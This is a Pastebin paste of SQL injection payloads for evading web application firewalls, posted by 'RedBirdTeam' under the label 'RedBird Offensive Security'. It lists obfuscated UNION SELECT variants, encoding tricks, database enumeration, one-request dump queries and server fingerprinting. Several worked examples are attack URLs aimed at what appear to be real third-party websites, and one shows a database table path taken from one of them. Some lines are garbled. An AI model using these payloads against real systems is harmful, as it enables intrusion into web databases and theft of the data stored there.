Advertisement
RedBirdTeam

SQL INJECTION | WAF Bypass

Aug 8th, 2019
1,693
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.02 KB | None | 0 0
  1.  
  2. _____ ____ _ _____ _ _ _ ______ _____ _______ _____ ____ _ _
  3. / ____|/ __ \| | |_ _| \ | | | | ____/ ____|__ __|_ _/ __ \| \ | |
  4. | (___ | | | | | | | | \| | | | |__ | | | | | || | | | \| |
  5. \___ \| | | | | | | | . ` |_ | | __|| | | | | || | | | . ` |
  6. ____) | |__| | |____ _| |_| |\ | |__| | |___| |____ | | _| || |__| | |\ |
  7. |_____/ \___\_\______| |_____|_|_\_|\____/|______\_____| |_| |_____\____/|_| \_|
  8. \ \ / /\ | ____| | _ \
  9. \ \ /\ / / \ | |__ | |_) |_ _ _ __ __ _ ___ ___
  10. \ \/ \/ / /\ \ | __| | _ <| | | | '_ \ / _` / __/ __|
  11. \ /\ / ____ \| | | |_) | |_| | |_) | (_| \__ \__ \
  12. \/ \/_/ \_\_| |____/ \__, | .__/ \__,_|___/___/
  13. __/ | |
  14. |___/|_| [RedBird Offensive Security]
  15.  
  16.  
  17. Métodos de evasión WAF para inyecciones sql
  18. Quiero compartir los métodos de evasión WAF para inyecciones sql. La mayoría son viejos pero pocos son más nuevos. Puede omitir la mayoría de los errores "404 prohibido" y "NO aceptable" mediante estos métodos.
  19.  
  20. -------------------------------------------------------------------------------------------------------------------------------
  21.  
  22. 1) id=1+UnIoN+SeLecT 1,2,3 --+
  23.  
  24. 2) id=1+UnIOn/**/SeLect 1,2,3 --+
  25.  
  26. 3) id=1+UNIunionON+SELselectECT 1,2,3 --+
  27.  
  28. 4) id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3 --+
  29.  
  30. 5) id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3 --+
  31.  
  32. 6) id=1+%23hihihi%0aUnIOn%23hihihi%0aSeLecT+1,2 ,3 --+
  33.  
  34. 7) id=1+UnIOn%0d%0aSeleCt%0d%0a1,2,3 --+
  35.  
  36. 8) Id=1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C1,2,3 --+
  37.  
  38. /*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+
  39.  
  40. 9) Id=1/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+
  41.  
  42. div + 0
  43. Having +1 = 0
  44. AND+ 1 = 0
  45. /*!and*/ +1 = 0
  46. and( 1 )=(0 ) x
  47. OR false the url query
  48. id =- 1 union all select
  49. id =null union all select
  50. id =1 +and+ false + union +all +select
  51. id = 9999 union all select
  52.  
  53. +union+distinct+select+
  54. +union+distinctROW+select+
  55. /**//*!12345UNION SELECT*//**/
  56. /**//*!50000UNION SELECT*//
  57.  
  58. http : //www.xxx.com/project.php?cat=Conservation'
  59. +and(1)=(0) +union+distinct+select+ 1
  60. and use: and 1=0 to apear column number in the page
  61. or
  62. +div+0
  63. Having+1=0
  64. +AND+1=0
  65. +/*!and*/+1=0
  66. and(1)=(0‏)
  67.  
  68. Hard WAF bypass tips
  69. Whitespaces :
  70. union(select(0),version(),(0),(0),(0),(0),(0),(0),
  71. (0))
  72. %0Aunion%0Aselect%0A1,2,3--
  73. /**/union/**/select/**/1,2,3--
  74. like ::
  75. PHP Code:
  76. http ://www.xxx.com/
  77. list_itinerary.php?id=-4%20union
  78. %20%28select%201,2,version
  79. %28%29,4,5,6,7,8%29%20--
  80. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
  81. NICE QUERY
  82. www.xxx.altervista.org/level2.php?id=-1'union+select*from(select+1)a+join(select'%3Cfont+color=red+font+face=vardana%3EMr_7un47!5%3C/font%3E')b+join+(select+version())c--+
  83.  
  84. www.xxx.org/level1.php?id=-1'%0AUunioNIOn%0AsELeCT%0A1,VERSION(),3%23
  85. =-=-=-=-=-=-=-=-=-=-=-=-=-=-
  86. Bypassing ::
  87. (Double Keyword): UNIunionON+SELselectECT
  88. +union+distinct+select+
  89. +union+distinctROW+select+
  90. union+/*!select*/+1,2,3
  91. union/**/select/**/1,2,3
  92. uni<on all sel<ect
  93. %20union%20/*!select*/%20
  94. /**//*!union*//**//*!select*//**/
  95. union%23aa%0Aselect
  96. /**/union/*!50000select*/
  97. /*!20000%0d%0aunion*/+/*!20000%0d
  98. %0aSelEct*/
  99. %252f%252a*/UNION%252f%252a /SELECT%252f
  100. %252a*/
  101. +%23sexsexsex%0AUnIOn%23sexsexsex
  102. %0ASeLecT+
  103. id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
  104. id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
  105. like ::
  106. PHP Code:
  107. http ://www.xxx.com/
  108. list_itinerary.php?id=-4%20union
  109. %23aa%0Aselect%201,2,version
  110. %28%29,4,5,6,7,8%20--
  111. PHP Code:
  112. http ://www.xxx.com/
  113. list_itinerary.php?id=-4%20/**/
  114. union/*!50000select*/
  115. %201,2,version
  116. %28%29,4,5,6,7,8%20--
  117. PHP Code:
  118. http ://www.xxx.com/
  119. list_itinerary.php?id=-4%20/*!
  120. 20000%0d%0aunion*/+/*!20000%0d
  121. %0aSelEct*/%201,2,version
  122. %28%29,4,5,6,7,8%20--
  123. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  124. after id no. like id=1 +/*!and*/+1=0
  125. +div+0
  126. Having+1=0
  127. +AND+1=0
  128. +/*!and*/+1=0
  129. and(1)=(0)
  130. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  131. false the url query :
  132. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  133. id= - 1 union all select
  134. id= null union all select
  135. id=1 +and+false+ union+all+select
  136. id= 9999 union all select
  137. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  138. Order Bypassing do like this
  139. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  140. /*!table_name*/
  141. +from /*!information_schema*/./*!tables*/ where
  142. table_schema=database()
  143. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  144. unhex(hex(Concat
  145. (Column_Name,0x3e,Table_schema,0x3e,table_
  146. Name)))
  147. /*!from*/information_schema.columns/*!where*/
  148. column_name%20/*!like*/char(37,%20112,%2097,
  149. %20115,%20115,%2037)
  150. like ::
  151. PHP Code:
  152. http ://www.westbury.com/
  153. article.php?
  154. article_id=-117%20union%20select
  155. %201,2,unhex%28hex%28Concat
  156. %28Column_Name,0x3e,Table_
  157. schema, 0x3e,table_Name
  158. %29%29%29,4,5,6,7/*!from*/
  159. information_schema.columns/*!
  160. where*/column_name%20/*!like*/
  161. char%2837,%20112,%2097,%20115,
  162. %20115,%2037%29--
  163. user_passwd>westbur6_website>user_info
  164. =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  165. used with order ::
  166. convert( using ascii) or unhex(hex())
  167. like :
  168. PHP Code:
  169. www. westbury. com/ article. php?
  170. article_id =- 117 union select 1 , 2 ,
  171. convert ( group_concat
  172. (table_name ) using ascii ), 4 , 5 ,6 , 7 +
  173. from +information_schema .tables --
  174. IF'ascii' dosent work? you can try
  175. PHP Code:
  176. ujis
  177. ucs2
  178. tis620
  179. swe7
  180. sjis
  181. macroman
  182. macce
  183. latin7
  184. latin5
  185. latin2
  186. koi8u
  187. koi8r
  188. keybcs2
  189. hp8
  190. geostd8
  191. gbk
  192. gb2132
  193. armscii8
  194. ascii
  195. binary
  196. cp1250
  197. big5
  198. cp1251
  199. cp1256
  200. cp1257
  201. cp850
  202.  
  203. ------------------------------Best Bypass WAF------------------------------------
  204.  
  205. [~] order by [~]
  206. /**/ORDER/**/BY/**/
  207. /*!order*/+/*!by*/
  208. /*!ORDER BY*/
  209. /*!50000ORDER BY*/
  210. /*!50000ORDER*//**//*!50000BY*/
  211. /*!12345ORDER*/+/*!BY*/
  212.  
  213. [~] UNION select [~]
  214. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  215. %55nion(%53elect 1,2,3)-- -
  216. +union+distinct+select+
  217. +union+distinctROW+select+
  218. /**//*!12345UNION SELECT*//**/
  219. /**//*!50000UNION SELECT*//**/
  220. /**/UNION/**//*!50000SELECT*//**/
  221. /*!50000UniON SeLeCt*/
  222. union /*!50000%53elect*/
  223. + #?uNiOn + #?sEleCt
  224. + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
  225. /*!%55NiOn*/ /*!%53eLEct*/
  226. /*!u%6eion*/ /*!se%6cect*/
  227. +un/**/ion+se/**/lect
  228. uni%0bon+se%0blect
  229. %2f**%2funion%2f**%2fselect
  230. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  231. REVERSE(noinu)+REVERSE(tceles)
  232. /*--*/union/*--*/select/*--*/
  233. union (/*!/**/ SeleCT */ 1,2,3)
  234. /*!union*/+/*!select*/
  235. union+/*!select*/
  236. /**/union/**/select/**/
  237. /**/uNIon/**/sEleCt/**/
  238. +%2F**/+Union/*!select*/
  239. /**//*!union*//**//*!select*//**/
  240. /*!uNIOn*/ /*!SelECt*/
  241. +union+distinct+select+
  242. +union+distinctROW+select+
  243. uNiOn aLl sElEcT
  244. UNIunionON+SELselectECT
  245. /**/union/*!50000select*//**/
  246. 0%a0union%a0select%09
  247. %0Aunion%0Aselect%0A
  248. %55nion/**/%53elect
  249. uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  250. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  251. %0A%09UNION%0CSELECT%10NULL%
  252. /*!union*//*--*//*!all*//*--*//*!select*/
  253. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  254. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  255. +UnIoN/*&a=*/SeLeCT/*&a=*/
  256. union+sel%0bect
  257. +uni*on+sel*ect+
  258. +#1q%0Aunion all#qa%0A#%0Aselect
  259. union(select (1),(2),(3),(4),(5))
  260. UNION(SELECT(column)FROM(table))
  261. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  262. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  263. union(select(1),2,3)
  264. union (select 1111,2222,3333)
  265. uNioN (/*!/**/ SeleCT */ 11)
  266. union (select 1111,2222,3333)
  267. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  268. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  269. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  270. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  271. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  272. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  273. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  274. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  275. /union\sselect/g
  276. /union\s+select/i
  277. /*!UnIoN*/SeLeCT
  278. +UnIoN/*&a=*/SeLeCT/*&a=*/
  279. +uni>on+sel>ect+
  280. +(UnIoN)+(SelECT)+
  281. +(UnI)(oN)+(SeL)(EcT)
  282. +’UnI”On’+'SeL”ECT’
  283. +uni on+sel ect+
  284. +/*!UnIoN*/+/*!SeLeCt*/+
  285. /*!u%6eion*/ /*!se%6cect*/
  286. uni%20union%20/*!select*/%20
  287. union%23aa%0Aselect
  288. /**/union/*!50000select*/
  289. /^.*union.*$/ /^.*select.*$/
  290. /*union*/union/*select*/select+
  291. /*uni X on*/union/*sel X ect*/
  292. +un/**/ion+sel/**/ect+
  293. +UnIOn%0d%0aSeleCt%0d%0a
  294. UNION/*&test=1*/SELECT/*&pwn=2*/
  295. un?<ion sel="">+un/**/ion+se/**/lect+
  296. +UNunionION+SEselectLECT+
  297. +uni%0bon+se%0blect+
  298. %252f%252a*/union%252f%252a /select%252f%252a*/
  299. /%2A%2A/union/%2A%2A/select/%2A%2A/
  300. %2f**%2funion%2f**%2fselect%2f**%2f
  301. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  302. /*!UnIoN*/SeLecT+
  303.  
  304. [~] information_schema.tables [~]
  305. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
  306. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
  307. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  308. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
  309. /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  310. /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
  311.  
  312. [~] concat() [~]
  313. CoNcAt()
  314. concat()
  315. CON%08CAT()
  316. CoNcAt()
  317. %0AcOnCat()
  318. /**//*!12345cOnCat*/
  319. /*!50000cOnCat*/(/*!*/)
  320. unhex(hex(concat(table_name)))
  321. unhex(hex(/*!12345concat*/(table_name)))
  322. unhex(hex(/*!50000concat*/(table_name)))
  323.  
  324. [~] group_concat() [~]
  325. /*!group_concat*/()
  326. gRoUp_cOnCAt()
  327. group_concat(/*!*/)
  328. group_concat(/*!12345table_name*/)
  329. group_concat(/*!50000table_name*/)
  330. /*!group_concat*/(/*!12345table_name*/)
  331. /*!group_concat*/(/*!50000table_name*/)
  332. /*!12345group_concat*/(/*!12345table_name*/)
  333. /*!50000group_concat*/(/*!50000table_name*/)
  334. /*!GrOuP_ConCaT*/()
  335. /*!12345GroUP_ConCat*/()
  336. /*!50000gRouP_cOnCaT*/()
  337. /*!50000Gr%6fuP_c%6fnCAT*/()
  338. unhex(hex(group_concat(table_name)))
  339. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  340. unhex(hex(/*!12345group_concat*/(table_name)))
  341. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  342. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  343. unhex(hex(/*!50000group_concat*/(table_name)))
  344. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  345. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  346. convert(group_concat(table_name)+using+ascii)
  347. convert(group_concat(/*!table_name*/)+using+ascii)
  348. convert(group_concat(/*!12345table_name*/)+using+ascii)
  349. convert(group_concat(/*!50000table_name*/)+using+ascii)
  350. CONVERT(group_concat(table_name)+USING+latin1)
  351. CONVERT(group_concat(table_name)+USING+latin2)
  352. CONVERT(group_concat(table_name)+USING+latin3)
  353. CONVERT(group_concat(table_name)+USING+latin4)
  354. CONVERT(group_concat(table_name)+USING+latin5)
  355. Group_Concat
  356. group_concat ()
  357. /*!group_concat*/ ()
  358. grOUp_ConCat ( /*!*/ , 0x3e , /*!*/ )
  359. group_concat (, 0x3c62723e )
  360. g % 72oup_c % 6Fncat % 28 % 76% 65rsion
  361. % 28 %29 ,% 22 ~ BlackRose% 22 %29
  362. CoNcAt ()
  363. CONCAT (DISTINCT Version ())
  364. concat (, 0x3a ,)
  365. concat %00 ()
  366. % 00CoNcAt ()
  367. /*!50000cOnCat*/ ( /*!Version()*/ )
  368. /*!50000cOnCat*/
  369. /**//*!12345cOnCat*/ (, 0x3a ,)
  370. concat_ws ()
  371. concat (0x3a ,, 0x3c62723e )
  372. /*!concat_ws(0x3a,)*/
  373. concat_ws ( 0x3a3a3a , version()
  374. CONCAT_WS ( CHAR ( 32, 58, 32 ), version
  375. (),)
  376. REVERSE( tacnoc )
  377. binary (version ())
  378. uncompress (compress ( version()))
  379. aes_decrypt ( aes_encrypt ( version
  380. (), 1), 1 )[/ b ][/ u ][/ size ][/ color ]
  381.  
  382. [~] after id no. like id=1 +/*!and*/+1=0 [~]
  383. +div+0
  384. Having+1=0
  385. +AND+1=0
  386. +/*!and*/+1=0
  387. and(1)=(0)
  388. cp852
  389. cp866
  390. cp932
  391. dec8
  392. euckr
  393. latin1
  394. utf8
  395. trick to appear info inside img tag
  396. PHP Code:
  397. concat( 0x223e3c62723e ,, 0x3c696d
  398. 67207372633d22 )
  399. when the column is get into html tag,but its not
  400. always inside img tag.
  401. it could be <a> or </noscript> or anything.
  402. like ::
  403. PHP Code:
  404. http ://fzszy.chinacourt.org/
  405. public/detail.php?
  406. id=-168' union /*!
  407. %53elect*/ concat
  408. (0x223e3c2f613e3c2f74643e,
  409. version
  410. (),0x3c6120687265663d22)--+
  411.  
  412. [DUMP DB in 1 Request]
  413. PHP Code:
  414. ( select (@) from ( select(@:= 0x00 ),
  415. ( select (@) from ( information_schema . columns) where ( table_schema >=@) and (@) in (@:= concat
  416. (@, 0x0a , ' [ ' ,table_schema , ' ] >' , table_name , ' > ' , column_name )))) x )
  417. ( select(@) from ( select (@:= 0x00 ),
  418. ( select (@) from ( table ) where (@) in (@:= concat
  419. (@, 0x0a , column1 , 0x3a , column2 )))) a )
  420.  
  421. [DUMP DB in 1 Request improve]
  422. PHP Code:
  423. ( select(@ x ) from (select (@x := 0x00 ),
  424. ( select( 0 ) from
  425. ( information_schema . columns) where
  426. ( table_schema !
  427. = 0x696e666f726d6174696f6e5f736368656d61 )and
  428. ( 0x00 ) in(@ x := concat
  429. (@ x ,0x3c62723e , table_schema , 0x2e , table_name , 0x3a , column_name )))) x )
  430. like
  431. http : //www.marinaplast.com/page.php?
  432. id=-13 union select 1,2,(select
  433. (@x)from(select(@x:=0x00),(select
  434. (0)from(information_schema.colu​​
  435. mns)where(table_schema!
  436. =0x696e666f726d6174696f6e5f736368656d61)and
  437. (0x00)in(@x:=​c​oncat
  438. (@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 --
  439.  
  440. WHITESPACES BYPASS .
  441. %09 %0A %0B %0C %0D %A0
  442. get version - DB_NAME - user - HOST_NAME -
  443. datadir
  444. PHP Code:
  445. version()
  446. convert( version() using latin1 )
  447. unhex ( hex( version()))
  448. @@GLOBAL. VERSION
  449. ( substr
  450. (@@version ,1 , 1 )=5 ) :: 1 true 0 fals
  451. # like #
  452. www. marinaplast. com/ page . php?
  453. id =- 13 union select 1 , 2 ,( substr
  454. (@@version ,1 , 1 )=5 ), 4, 5 --
  455. 1 it 's mean version 5 and 0 mean version 4
  456. +and substring(version(),1,1)=4
  457. +and substring(version(),1,1)=5
  458. +and substring(version(),1,1)=9
  459. +and substring(version(),1,1)=10
  460. # like #
  461. www.marinaplast.com/page.php?
  462. id=13+and substring(version
  463. (),1,1)=5
  464. download good version 5
  465. www.marinaplast.com/page.php?
  466. id=13+and substring(version
  467. (),1,1)=4
  468. not download good version 4
  469. version 5
  470. id=1 /*!50094aaaa*/ error
  471. id=1 /*!50095aaaa*/ no error
  472. id=1 /*!50096aaaa*/ error
  473. # like #
  474. www.marinaplast.com/page.php?id=13 /
  475. *!50095aaaa*/ no error v5
  476. version 4
  477. id=1 /*!40123 1=1*/--+- no error
  478. id=1 /*!40122rrrr*/ no error
  479. # like #
  480. www.marinaplast.com/page.php?id=13 /
  481. *!40122rrrr*/ error not v4
  482. ☆¸.•*☆ ☆*•.¸☆
  483. DB_NAME()
  484. @@database
  485. database()
  486. id=vv()
  487. # like #
  488. www.marinaplast.com/page.php?
  489. id=-13 union select 1,2,DB_NAME
  490. (),4,5 --
  491. www.marinaplast.com/page.php?id=vv
  492. ()
  493. ☆¸.•*☆ ☆*•.¸☆
  494. @@user
  495. user()
  496. user_name()
  497. system_user()
  498. # like #
  499. www.marinaplast.com/page.php?
  500. id=-13 union select 1,2,user
  501. (),4,5 --
  502. ☆¸.•*☆ ☆*•.¸☆
  503. HOST_NAME()
  504. @@hostname
  505. @@servername
  506. SERVERPROPERTY()
  507. # like #
  508. www.marinaplast.com/page.php?
  509. id=-13 union select 1,2,HOST_NAME
  510. (),4,5 --
  511. ☆¸.•*☆ ☆*•.¸☆
  512. @@datadir
  513. datadir()
  514. # like #
  515. www.marinaplast.com/page.php?
  516. id=-13 union select 1,2,datadir(),4,5 --
  517. ☆¸.•*☆ ☆*•.¸☆
  518. ASPX
  519. and 1=0/@@version
  520. ' and 1 =0 /@@ version;--
  521. ) and 1 =@@version--
  522. and 1 = 0 /user ;--
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement